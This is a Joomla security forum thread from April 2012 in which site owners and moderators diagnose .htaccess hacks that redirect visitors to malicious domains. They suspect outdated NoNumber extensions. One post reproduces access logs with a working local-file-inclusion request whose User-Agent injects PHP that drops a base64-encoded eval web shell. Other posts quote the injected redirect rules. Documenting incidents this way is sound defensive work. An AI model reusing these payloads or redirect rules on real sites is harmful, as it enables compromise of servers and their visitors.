Joomla .htaccess hacked to xxx.ru

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
User avatar
MoonfireArt
Joomla! Explorer
Joomla! Explorer
Posts: 466
Joined: Wed Feb 29, 2012 3:27 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by MoonfireArt » Wed Apr 11, 2012 1:58 pm

BernardT wrote:
brinw05 wrote: ... but it's important that NoNumber Framework extension (-set) is listed there in VEL, as the previus versions are know to have not one but several vulnerabilities, both LFI and RFI. Unfortunately, NoNumber is listed in most of the exploits-data sites so it's vulerability is well documented and now used as a good target for malware-seeding attacks. The additional problem with NoNumber is that the components which are using it are easy to spot via simple googlesweep or pintests on J! installations...
That sucks! Those extensions (and that Framework) saved me hours of coding. I would hate to think that I now have to change it all (Tabber and Slider are used extensively throughout the sites). A question though, since we do not have registered users or anyway for people to post any information, would that lessen the vulnerability to these attacks?

Also, a warning to everyone. It seems these same hackers/spammers are now infiltrating Yahoo mail accounts. A company employee recently had her account and contact list hijacked to send out spam e-mails from her account to some of the same sites these redirects are going to. As I am sure Yahoo! takes it's security very seriously, it just goes to show that anyone can be vulnerable. Step up your e-mail precautions!

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Wed Apr 11, 2012 2:30 pm

A question though, since we do not have registered users or anyway for people to post any information, would that lessen the vulnerability to these attacks?
in short, no.
Also, a warning to everyone. It seems these same hackers/spammers are now infiltrating Yahoo mail accounts.
slightly irrelevant to these discussions, as they have been attacking email accounts for years
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

shwaran
Joomla! Apprentice
Joomla! Apprentice
Posts: 29
Joined: Mon Apr 19, 2010 1:13 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by shwaran » Wed Apr 11, 2012 3:27 pm

MoonfireArt wrote:
BernardT wrote:
brinw05 wrote: ... but it's important that NoNumber Framework extension (-set) is listed there in VEL, as the previus versions are know to have not one but several vulnerabilities, both LFI and RFI. Unfortunately, NoNumber is listed in most of the exploits-data sites so it's vulerability is well documented and now used as a good target for malware-seeding attacks. The additional problem with NoNumber is that the components which are using it are easy to spot via simple googlesweep or pintests on J! installations...
with in my experience Nonumber framework and extension are vulnerabilities.

here is my websites details

website - 1
Joomla! 2.5.4
obrss
J2XML Importer
JA News Pro Module
Lof ArticlesSlideShow Module
Content - 1Pixelout Audio Player

website - 2
Joomla! 2.5.4
obrss
J2XML Importer
JA News Pro Module
Lof ArticlesSlideShow Module
Content - 1Pixelout Audio Player
no number Advanced Module Manager
no number cache cleaner

website 2 only hacked and changed the .htaccess

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 37261
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Webdongle » Wed Apr 11, 2012 3:37 pm

shwaran wrote:...
with in my experience Nonumber framework and extension are vulnerabilities.
...

website 2 only hacked and changed the .htaccess
What version of Advanced module manager was on 'site 2' ? The version with the known vulnerabilities ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

Ace__
Joomla! Intern
Joomla! Intern
Posts: 64
Joined: Thu Sep 27, 2007 1:42 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Ace__ » Wed Apr 11, 2012 6:45 pm

Had me server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...

From the access.logs (IP of attacker and my domain hidden)

Code: Select all

XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:28 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:29 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:30 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:31 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:32 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:33 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 3926 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:36 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:38 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:39 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:40 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:41 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:43 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:44 +0100] "POST /tmp/j.php HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:45 +0100] "POST /tmp/j.php HTTP/1.1" 200 - "-" "Mozilla/4.0 (Linux; Windows NT 5.0; ja; rv:2)" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:47 +0100] "GET /tmp/jos_almi.php HTTP/1.1" 200 56803 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre" www.mydomain.ie
So basically it placed a j.php file in the tmp folder and then a jos_almi.php file and from these created or overwrote a .htaccess file in every first level directory.

I've updated all sites to 1.5.26 but I think I will not use NoNumber in future (it was only for Admin Bar Docker).

shwaran
Joomla! Apprentice
Joomla! Apprentice
Posts: 29
Joined: Mon Apr 19, 2010 1:13 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by shwaran » Wed Apr 11, 2012 7:00 pm

Webdongle wrote:
shwaran wrote:...
with in my experience Nonumber framework and extension are vulnerabilities.
...

website 2 only hacked and changed the .htaccess
What version of Advanced module manager was on 'site 2' ? The version with the known vulnerabilities ?
Advanced Module Manager 2.4.2

there are updated version of this module is available how ever for me i don't risk to install this extension again

User avatar
Bernard T
Joomla! Guru
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by Bernard T » Wed Apr 11, 2012 8:03 pm

Ace__ wrote:Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...
From the access.logs

Code: Select all

......[b] /index.php?nn_qp=1[/b] ...
That's the earlier mentioned query string that makes your Joomlas so easy targets. Just one Google search and there is the list of possible "sitting ducks" :(

@ Mandville & PhilD ... since evidence is more and more clear that old NoNumber extensions are one of the main targets, would it be possible that you make a special note in VEL about it, something like:

"because of high number of attacks using old vulnerable versions of NoNumber extensions, it is strongly advised that you immediately upgrade your old NoNumber extension to the newest available version"

Many people with hijacked sites go to VEL, through the list, but "white" background could be misleading and the over-jump it in hurry of situation in which they are...
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Wed Apr 11, 2012 9:10 pm

Not all sites have nonumber extensions installed.
Have those who do have nonumber installed spoken to the developer.
The reasoning and notes on the nonumber entries have beenmade clear as to the date and version of the extensions involved. for practical reasons, the vel list is not updated with every new version.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Wed Apr 11, 2012 9:13 pm

Ace__ wrote:Had me server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...
It could also have been your out of date instal. Please contact the developer with your concerns telling them the full system setup with versioning of joomla and the extension
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Bernard T
Joomla! Guru
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by Bernard T » Wed Apr 11, 2012 10:02 pm

VED suggestion - OK! :pop
mandville wrote:
Ace__ wrote:Had me server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...
It could also have been your out of date instal. ...
well Mandville , the copy of the log that Ace__ presented here is undoubtedly clear - the file is being inserted with NoNumber method, here, at this point :
Ace__ wrote: From the access.logs ...

Code: Select all

 <? file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>"
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 37261
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Webdongle » Wed Apr 11, 2012 10:18 pm

BernardT wrote:.... the copy of the log that Ace__ presented here is undoubtedly clear - the file is being inserted with NoNumber method,...
But what version of nonumber was it the version that is known to be vulnerable or the one that is said not to be vulnerable ?

If the former then it does not prove nonumber is still vulnerable and is old news. But if the latter then it is significant.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Wed Apr 11, 2012 10:36 pm

i have requested that no_number make an appearance here, note i did say that not all users had "no number" extensions.
Its also nice for the devs to inform both jed and vel on any security releases they make
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Bernard T
Joomla! Guru
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by Bernard T » Wed Apr 11, 2012 10:41 pm

mandville wrote:i have requested that no_number make an appearance here, note i did say that not all users had "no number" extensions.
Its also nice for the devs to inform both jed and vel on any security releases they make
An excellent idea! That might be clarifying for both sides...
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

Ace__
Joomla! Intern
Joomla! Intern
Posts: 64
Joined: Thu Sep 27, 2007 1:42 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Ace__ » Thu Apr 12, 2012 8:35 am

The NoNumber Elements plugin I was using was 2.2.2 (Feb 2011). I believe the current version is 3.0.2. Incidentally the NoNumber RSS feed on VED is returning a 404.

I believe the exploit was discovered on Oct 10th 2011 and fixed on Oct 17th 2011. (Source)

Would this have meant that NoNumbers listing on VED would have gone RED and then WHITE within a few days?? What is the difference between white and green listings in VED? It does not say. The wording that is there does not read well (and I am a native English speaker).

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by PhilD » Thu Apr 12, 2012 1:32 pm

The nonumber CustoMenu updated version works now and so check back at the developers website to see if you still get the 404 error.

I have seen some extensions accessed in November 2011, and then nothing happened hack wise until March this year.

VEL
Red- bad version(s) not fixed, Blue - Good -updated and fixed, No Color- Talk to the Developer.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

User avatar
mcsmom
Joomla! Exemplar
Joomla! Exemplar
Posts: 7985
Joined: Thu Aug 18, 2005 8:43 pm
Location: New York
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by mcsmom » Thu Apr 12, 2012 2:06 pm

I have spoken with someone who is at a big host who reports that 30/30 sites with this hack have some variation of extplorer installed (ninjaexplorer, joomlaextplorer etc). Do people in this thread have either those extensions or similar installed?
So we must fix our vision not merely on the negative expulsion of war, but upon the positive affirmation of peace. MLK 1964.
http://officialjoomlabook.com Get it at http://www.joomla.org/joomla-press-official-books.html Buy a book, support Joomla!.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by PhilD » Thu Apr 12, 2012 4:17 pm

Don't be to quick to blame a file manager extension especially if it is an up to date version. If access is gained to a site one of the things that sometimes happen is a file manager extension is installed to assist the hacker with adding files and changing things on your site. You have to find out if and or when the file manager got installed. Many times people will have no clue about what their site actually contains, so it can be rather difficult to figure out when the file manger got there.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

X-Bit
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Wed Oct 31, 2007 2:28 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by X-Bit » Thu Apr 12, 2012 4:59 pm

Hello @all!

After such an attack I restored a site by scanning / cleaning it thourghly. As I am quite experienced in doing this work I am quite sure there is no (known) threat anymore. It is now some 2 weeks ago and no malicous alteration has been reported since then.

The only thing, as I already asked, is that some users receive timeouts and are unable to reach the site, not depending on high- or low traffic hours. If they try to access the site appending the /index.php they gain instantly access.

I would like to know if somebody encountered the same problem.

Just for the records, customer had old eXtplorer and some actual NoNumber extensions on his site. Joomla version was 1.5.26. Unfortunately Logs had been disabled on his server, which I corrected for future analysis.

Ace__
Joomla! Intern
Joomla! Intern
Posts: 64
Joined: Thu Sep 27, 2007 1:42 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Ace__ » Thu Apr 12, 2012 5:12 pm

X-Bit wrote:some users receive timeouts and are unable to reach the site.
If they visited your site while the hack was active they will need to clear their cookies and browser cache before being able to visit your site again. The malicious redirect also placed a malicious cookie on visiting machines.

User avatar
Bernard T
Joomla! Guru
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by Bernard T » Thu Apr 12, 2012 6:20 pm

Ace__ wrote:
X-Bit wrote:some users receive timeouts and are unable to reach the site.
If they visited your site while the hack was active they will need to clear their cookies and browser cache before being able to visit your site again. The malicious redirect also placed a malicious cookie on visiting machines.
Yes, exactly. As there were webserver (apache) generated HTTP redirects used (301 - permanent), today's browsers tend to cache this redirects and thats why...
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

X-Bit
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Wed Oct 31, 2007 2:28 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by X-Bit » Thu Apr 12, 2012 6:36 pm

Thats true! I forgott about this one, saw it on my system but did not thought about it anymore... Thanks for pointing me to the right direction!

frankgill
Joomla! Intern
Joomla! Intern
Posts: 53
Joined: Fri Mar 18, 2011 1:23 am
Location: Ireland

hacked

Post by frankgill » Fri Apr 13, 2012 9:38 am

I have been hacked and have found the offending file to be .htaccess and so I deleted it and then went to a joomla pack I had on my hard drive to see if I could get the origional .htaccess file but all I found was the htaccess.txt file. If I can find the .htaccess (HTACCESS FILE extention) I hope that when I upload to my directory the problem will be solved.

Has anyone a .htaccess (HTACCESS file extent) for joomla 1.5.23 that they can share. I have tried to rename the htacess.txt file but if will not let me. I have tried explore extention and the akeeba wizard to unzipo my back up and locate the file but I can not find the file in the backup file. I do not wnat to do a full backup as yet as I do not know when I was hacked!!! (I know - long story)

joomlovenow
Joomla! Intern
Joomla! Intern
Posts: 92
Joined: Thu Mar 22, 2012 1:15 am
Location: Norway
Contact:

Re: hacked

Post by joomlovenow » Fri Apr 13, 2012 4:11 pm

just rename the htaccess.txt file to .htaccess and upload it to your server.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Fri Apr 13, 2012 10:29 pm

previous 2 posts merged to this topic
joomlovenow wrote:just rename the htaccess.txt file to .htaccess and upload it to your server.
whitewash! its not as simple as that , so perhaps follow the sticky called "before you post, read this" and other advice in this forum
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

yaanimai
Joomla! Explorer
Joomla! Explorer
Posts: 349
Joined: Thu Jun 14, 2007 2:48 pm
Location: Coppell, Texas
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by yaanimai » Tue Apr 17, 2012 5:03 pm

BernardT,

I downloaded the script you posted, unzipped it & uploaded the 3 files to the root directory of my site but when I browse to http://www.mysite.com/jamss-0.1.2.php it runs for several minutes then it redirects to this page

http://www. xxxxx . ru/ in.cgi?4 (added spaces & x's so as not to post link to malicious site)

Am I doing something wrong?
Last edited by yaanimai on Tue Apr 17, 2012 9:52 pm, edited 1 time in total.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Joomla .htaccess hacked to xxx.ru

Post by PhilD » Tue Apr 17, 2012 8:47 pm

Your site is hacked and you are going to have to at minimum delete any files within the Joomla /tmp directory (a most likely place) and correct the .htaccess file. Until the htaccess file is corrected and the hack that is modifying the htaccess file is removed, you will continue to be redirected to malware sites when requesting anything on your site. The .htaccess files are parsed by the server before any other site file is, so you can never reach the script while the htaccess file has the malware code in it. If you remove this code without removing the hack files the redirect code will be put back upon first site access.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

Wrinasellers
Joomla! Apprentice
Joomla! Apprentice
Posts: 21
Joined: Thu Apr 15, 2010 11:51 pm

hacked by sas-air.xx and pin-se.xx

Post by Wrinasellers » Fri Apr 20, 2012 7:09 pm

Hello to all A little help Please.

My site is being redirected.
I have changed the file permission -(per my server ad - godaddy to 705).
I have deleted the added script at the top and bottom of the page i all the .htaccess files.:: and when I remove them - they reappear in all my main directories .htaccess for common Joomla directory files only. (Directories that I have created that are not attacked.
THE TOP CODE:::
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu||web-archiv)\.(.*) RewriteRule ^(.*)$ http://pin-se.xx/acu?11 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://pin-se.xx/acu?11 [R=301,L] </IfModule>

THE BOTTOM CODE:::
ErrorDocument 400 http://pin-Se.xx/acu?11 ErrorDocument 401 http://pin-se.xx/acu?11 ErrorDocument 403 http://pin-se.xx/acu?11ErrorDocument 404 http://pin-se.xx/acu?11 ErrorDocument 500 http://pin-se.xx/acu?11
THE CODE CONTINUOUSLY REAPPEAR EVEN IF DELETED FROM MAIN htaccess.

Apparently this is arunning script in one of my joomla product downloads...Anyhelp???

thanks so much

Wrina
Last edited by mandville on Fri Apr 20, 2012 7:22 pm, edited 1 time in total.
Reason: broke links, remov ed excessive code

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: hacked by sas-air.xx and pin-se.xx

Post by mandville » Fri Apr 20, 2012 7:23 pm

my first offer of help would be to use the forum search . there you will find a major discussion on this hack.
I was going to link to the topic but will just merge this postonto the end of it.
I suggest you read ALL the information in the posts for how to deal with these (and similar hacks)
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Wrinasellers
Joomla! Apprentice
Joomla! Apprentice
Posts: 21
Joined: Thu Apr 15, 2010 11:51 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Wrinasellers » Sat Apr 21, 2012 12:50 am

If you have this Error below in your .htaccess files it is going to take some work on your part. Steps I took to solve the problem are at the end of the code below::

There are two codes, this one is at the top... there is another code at the bottom of the .htaccess files. Click/hold and scan to see them -- they are to the far right
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo||allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://air-sas.xx/space?7 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|x|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://air-sas.xx/space?7 [R=301,L] </IfModule>

Steps
1) I upgraded from Joomla 1.5.25 to 1.5.26
2) Called Godaddy(ISP) they had to go above my root directory to disable the affected .htacces file.
3) I had to delete all the .htaccess files from all my Directories (Joomla 1st level Directories were the only ones effected) . If you can not delete all your .htaccess files this will not work for you. Deleting just the code does not work. (i tried this twice before i learned this)

4) Delete modules that you are unsure about.

4) Clear your ISP hosted temp files/ backups / cache of all .htaccess . or else all the htaccess files will be rewritten...again and again.

5) If you have stored any zip files from your modules/plugin/comp on your server - place them somewhere else - because I have yet to figure out which module actually has the script in it.

6) Clear your browser history and look again for the redirects.
Check firefox (upgrade)... google worked fine but firefox was affected and rerouting the script's calls to: air-sas.xx and sasrep.xx.....

7) Call your server ISP after you have cleared everything, and ask them to recheck the upper root directory to make sure the corrupted .htaccess file has not been reactivated (if you are on shared hosting )

It took me three attempts... to make sure i cleared all the .htaccess files... if you leave one you leave yourself open...

I do not know if other ISP are being affected -

Time Investment to fix:: 9am to 7:43 --- All Day
& 4 calls to godaddy - They were very helpful.

Good Luck!!!
Last edited by PhilD on Sun Apr 22, 2012 11:59 pm, edited 4 times in total.
Reason: broke link and snipped code - again, removed solved marker, retitled [PhilD wrote - turned off url parsing for post]

HollyK
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Sun Apr 22, 2012 11:54 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by HollyK » Mon Apr 23, 2012 12:03 am

Similar thing has happened to my site.
The site appeared fine to me as I always had it bookmarked and went straight to it via that but it was brought to my attention by a member who googled my site and entered via its google link..or should i say tried to enter. Upon clciking the google listing for my site it took him to a russian page whereupon it tried to begin installing a trojan.

I contacted my hosting company and they immediately did a clean install...wiped everything.
I did have a back up but unfortnately when i installed it using kickstart ( great app btw) the same thing happened.
The hosting comp - did another clean install.

So I have now ran the backup on my local machine and everything appears fine as it did before, though the problem is obviously when its set live that the same thing will probably happen when someone googles my site and enters that way.

What can I do to find the malicious code now that I have it running via XAMPP on my local machine.

PS: i looked over the htaccess file and it doesn't appear to have anything out of the ordinary in it.

Thanks in advance.
HK


Locked

Return to “Security in Joomla! 1.5”